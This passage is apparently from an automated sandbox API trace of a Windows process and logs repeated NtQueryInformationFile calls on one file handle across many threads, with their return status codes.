FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 293 os_tid = 0x880 [0151.773] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fdb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fdb0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 294 os_tid = 0x8f0 [0151.775] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fba0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fba0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 295 os_tid = 0xa18 [0151.777] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47efb90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47efb90, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 296 os_tid = 0x8a0 [0151.779] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa50, FileInformation=0x44d8128) returned 0x0 Thread: id = 297 os_tid = 0x870 [0151.783] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfa78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfa78, FileInformation=0x44d8128) returned 0x0 Thread: id = 298 os_tid = 0x9a0 [0151.784] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430ff60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430ff60, FileInformation=0x44d8128) returned 0x0 Thread: id = 299 os_tid = 0x2c4 [0151.788] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477f7b8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477f7b8, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 300 os_tid = 0x890 [0151.789] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef878, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef878, FileInformation=0x44d8128) returned 0x0 Thread: id = 301 os_tid = 0x4e8 [0151.791] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f908, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f908, FileInformation=0x44d8128) returned 0x0 Thread: id = 302 os_tid = 0xcc [0151.793] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffd50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffd50, FileInformation=0x44d8128) returned 0x0 Thread: id = 303 os_tid = 0xd0 [0151.795] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fae0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fae0, FileInformation=0x44d8128) returned 0x0 Thread: id = 304 os_tid = 0xd4 [0151.797] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f828, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f828, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 305 os_tid = 0xd8 [0151.800] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef7b8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef7b8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 306 os_tid = 0xdc [0151.802] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f9e0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f9e0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 307 os_tid = 0xe0 [0151.804] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fb70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fb70, FileInformation=0x44d8128) returned 0x0 Thread: id = 308 os_tid = 0xe4 [0151.806] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fdf0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fdf0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 309 os_tid = 0xe8 [0151.807] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df8f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df8f8, FileInformation=0x44d8128) returned 0x0 Thread: id = 310 os_tid = 0xec [0151.809] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfd38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfd38, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 311 os_tid = 0x748 [0151.811] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfc30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfc30, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 312 os_tid = 0xc4 [0151.816] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff10, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 313 os_tid = 0x620 [0151.818] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f8d8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f8d8, FileInformation=0x44d8128) returned 0x0 Thread: id = 314 os_tid = 0x910 [0151.820] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fec0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fec0, FileInformation=0x44d8128) returned 0x0 Thread: id = 315 os_tid = 0x950 [0151.822] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478fae8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478fae8, FileInformation=0x44d8128) returned 0xc000000d Thread: id = 316 os_tid = 0x940 [0151.824] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfcc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfcc0, FileInformation=0x44d8128) returned 0x0 Thread: id = 317 os_tid = 0x980 [0151.825] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff8f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff8f8, FileInformation=0x44d8128) returned 0x0 Thread: id = 318 os_tid = 0xa10 [0151.827] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff50, FileInformation=0x44d8128) returned 0x0 Thread: id = 319 os_tid = 0x72c [0151.829] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47afa08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47afa08, FileInformation=0x44d8128) returned 0x0 Thread: id = 320 os_tid = 0x9e0 [0151.830] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfdd8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfdd8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 321 os_tid = 0x9c4 [0151.832] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490f9e0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490f9e0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 322 os_tid = 0xa6c [0151.834] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfcc8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfcc8, FileInformation=0x44d8128) returned 0x0 Thread: id = 323 os_tid = 0xb00 [0151.836] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482fe38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482fe38, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 324 os_tid = 0xaf8 [0151.843] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fed0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fed0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 325 os_tid = 0xae4 [0151.844] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efc38, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efc38, FileInformation=0x44d8128) returned 0x0 Thread: id = 326 os_tid = 0x344 [0151.846] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x484fd28, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x484fd28, FileInformation=0x44d8128) returned 0x0 Thread: id = 327 os_tid = 0x808 [0151.848] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476fbc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476fbc0, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 328 os_tid = 0x858 [0151.850] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fba8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fba8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 329 os_tid = 0x224 [0151.852] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf790, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf790, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 330 os_tid = 0x4dc [0151.853] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffa80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffa80, FileInformation=0x44d8128) returned 0xc00000bb Thread: id = 331 os_tid = 0x78c [0151.854] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df7d8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df7d8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 332 os_tid = 0xb0 [0151.861] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afba0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afba0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 333 os_tid = 0x314 [0151.863] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x482f878, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x482f878, FileInformation=0x44d8128) returned 0x0 Thread: id = 334 os_tid = 0x804 [0151.865] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f958, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f958, FileInformation=0x44d8128) returned 0x0 Thread: id = 335 os_tid = 0x854 [0151.866] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ff9e8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ff9e8, FileInformation=0x44d8128) returned 0x0 Thread: id = 336 os_tid = 0xa78 [0151.868] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf7f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf7f8, FileInformation=0x44d8128) returned 0x0 Thread: id = 337 os_tid = 0x6a8 [0151.870] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af910, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af910, FileInformation=0x44d8128) returned 0x0 Thread: id = 338 os_tid = 0x7a8 [0151.872] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479ff00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479ff00, FileInformation=0x44d8128) returned 0x0 Thread: id = 339 os_tid = 0x330 [0151.873] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fda8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fda8, FileInformation=0x44d8128) returned 0x0 Thread: id = 340 os_tid = 0x3a4 [0151.875] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fd98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fd98, FileInformation=0x44d8128) returned 0x0 Thread: id = 341 os_tid = 0x67c [0151.876] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483fa00, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483fa00, FileInformation=0x44d8128) returned 0x0 Thread: id = 342 os_tid = 0x5cc [0151.878] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430f978, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430f978, FileInformation=0x44d8128) returned 0x0 Thread: id = 343 os_tid = 0x840 [0151.880] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x483f9e8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x483f9e8, FileInformation=0x44d8128) returned 0x0 Thread: id = 344 os_tid = 0x69c [0151.881] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fcb0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fcb0, FileInformation=0x44d8128) returned 0x0 Thread: id = 345 os_tid = 0x6f0 [0151.884] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434f960, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434f960, FileInformation=0x44d8128) returned 0x0 Thread: id = 346 os_tid = 0x810 [0151.885] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47af980, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47af980, FileInformation=0x44d8128) returned 0x0 Thread: id = 347 os_tid = 0xa88 [0151.887] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff70, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 348 os_tid = 0x43c [0151.888] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485fc58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485fc58, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 349 os_tid = 0x670 [0151.890] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afd90, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afd90, FileInformation=0x44d8128) returned 0x0 Thread: id = 350 os_tid = 0xa14 [0151.892] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f938, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f938, FileInformation=0x44d8128) returned 0x0 Thread: id = 351 os_tid = 0x990 [0151.894] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x432fd58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x432fd58, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 352 os_tid = 0x2dc [0151.896] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481f788, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481f788, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 353 os_tid = 0x74c [0151.898] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f9f8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f9f8, FileInformation=0x44d8128) returned 0x0 Thread: id = 354 os_tid = 0x3c4 [0151.899] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fb18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fb18, FileInformation=0x44d8128) returned 0x0 Thread: id = 355 os_tid = 0x90 [0151.901] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fb98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fb98, FileInformation=0x44d8128) returned 0x0 Thread: id = 356 os_tid = 0x630 [0151.903] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479fe50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479fe50, FileInformation=0x44d8128) returned 0x0 Thread: id = 357 os_tid = 0x124 [0151.905] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ffa98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ffa98, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 358 os_tid = 0xc0 [0151.907] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fc18, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fc18, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 359 os_tid = 0x360 [0151.908] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fbd8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fbd8, FileInformation=0x44d8128) returned 0x0 Thread: id = 360 os_tid = 0x920 [0151.910] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fca8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fca8, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 361 os_tid = 0xbec [0151.912] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487f880, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487f880, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 362 os_tid = 0x6b8 [0151.914] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fbc0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fbc0, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 363 os_tid = 0x30c [0151.916] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489f788, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489f788, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 364 os_tid = 0xbfc [0151.918] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x476f798, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x476f798, FileInformation=0x44d8128) returned 0xc0000002 Thread: id = 365 os_tid = 0x3f8 [0151.919] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x435fee8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x435fee8, FileInformation=0x44d8128) returned 0x0 Thread: id = 366 os_tid = 0x6cc [0151.921] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fab0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fab0, FileInformation=0x44d8128) returned 0x0 Thread: id = 367 os_tid = 0x830 [0151.922] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f9f0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f9f0, FileInformation=0x44d8128) returned 0x0 Thread: id = 368 os_tid = 0x75c [0151.924] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x487fa08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x487fa08, FileInformation=0x44d8128) returned 0x0 Thread: id = 369 os_tid = 0x7f0 [0151.927] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x490fa50, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x490fa50, FileInformation=0x44d8128) returned 0x0 Thread: id = 370 os_tid = 0x710 [0151.928] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bff80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bff80, FileInformation=0x44d8128) returned 0x0 Thread: id = 371 os_tid = 0x5d8 [0151.930] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bfcb8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bfcb8, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 372 os_tid = 0xbe4 [0151.931] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x485f798, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x485f798, FileInformation=0x44d8128) returned 0xc0000010 Thread: id = 373 os_tid = 0x600 [0151.933] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fb40, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fb40, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 374 os_tid = 0xbd0 [0151.934] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x489fd98, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x489fd98, FileInformation=0x44d8128) returned 0x0 Thread: id = 375 os_tid = 0x158 [0151.937] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488f878, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488f878, FileInformation=0x44d8128) returned 0x0 Thread: id = 376 os_tid = 0xbd8 [0151.938] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x494fde8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x494fde8, FileInformation=0x44d8128) returned 0x0 Thread: id = 377 os_tid = 0xbe8 [0151.940] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48cfac0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48cfac0, FileInformation=0x44d8128) returned 0x0 Thread: id = 378 os_tid = 0xbdc [0151.942] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x434fb80, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x434fb80, FileInformation=0x44d8128) returned 0x0 Thread: id = 379 os_tid = 0x5b4 [0151.945] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x488fd08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x488fd08, FileInformation=0x44d8128) returned 0x0 Thread: id = 380 os_tid = 0x614 [0151.947] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42ef950, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42ef950, FileInformation=0x44d8128) returned 0x0 Thread: id = 381 os_tid = 0x690 [0151.949] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480fe08, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480fe08, FileInformation=0x44d8128) returned 0x0 Thread: id = 382 os_tid = 0xa68 [0151.951] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48afd78, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48afd78, FileInformation=0x44d8128) returned 0xc0000003 Thread: id = 383 os_tid = 0x7d0 [0151.952] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436fa60, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436fa60, FileInformation=0x44d8128) returned 0x0 Thread: id = 384 os_tid = 0x7d8 [0151.954] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fce8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fce8, FileInformation=0x44d8128) returned 0x0 Thread: id = 385 os_tid = 0x24c [0151.955] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x480ff30, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x480ff30, FileInformation=0x44d8128) returned 0x0 Thread: id = 386 os_tid = 0x9f8 [0151.957] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47df818, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47df818, FileInformation=0x44d8128) returned 0x0 Thread: id = 387 os_tid = 0x798 [0151.959] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47dfa70, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47dfa70, FileInformation=0x44d8128) returned 0x0 Thread: id = 388 os_tid = 0xa3c [0151.961] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x48bfad8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x48bfad8, FileInformation=0x44d8128) returned 0x0 Thread: id = 389 os_tid = 0x8c0 [0151.962] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x436f920, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x436f920, FileInformation=0x44d8128) returned 0x0 Thread: id = 390 os_tid = 0x708 [0151.964] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47ef938, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47ef938, FileInformation=0x44d8128) returned 0x0 Thread: id = 391 os_tid = 0xa64 [0151.965] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x479f7b0, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x479f7b0, FileInformation=0x44d8128) returned 0x0 Thread: id = 392 os_tid = 0xa30 [0151.967] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47cf850, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47cf850, FileInformation=0x44d8128) returned 0x0 Thread: id = 393 os_tid = 0x388 [0151.969] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x478f8d8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x478f8d8, FileInformation=0x44d8128) returned 0x0 Thread: id = 394 os_tid = 0x760 [0151.970] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x481fa10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x481fa10, FileInformation=0x44d8128) returned 0x0 Thread: id = 395 os_tid = 0xa54 [0151.972] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x42efac8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x42efac8, FileInformation=0x44d8128) returned 0x0 Thread: id = 396 os_tid = 0x738 [0151.973] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477ff10, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477ff10, FileInformation=0x44d8128) returned 0x0 Thread: id = 397 os_tid = 0x488 [0151.986] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x486f978, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x486f978, FileInformation=0x44d8128) returned 0x0 Thread: id = 398 os_tid = 0x6dc [0151.987] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x477fa58, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x477fa58, FileInformation=0x44d8128) returned 0x0 Thread: id = 399 os_tid = 0x7a0 [0151.989] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x430fdc8, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x430fdc8, FileInformation=0x44d8128) returned 0x0 Thread: id = 400 os_tid = 0x73c [0151.991] NtQueryInformationFile (in: FileHandle=0x680, IoStatusBlock=0x47bf808, FileInformation=0x44d8128, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x47bf808, FileInformation=0x44d8128) returned 0x0 Thread: id = 401 os_tid = 0x1c0 [0151.993] NtQueryInformationFile (in: 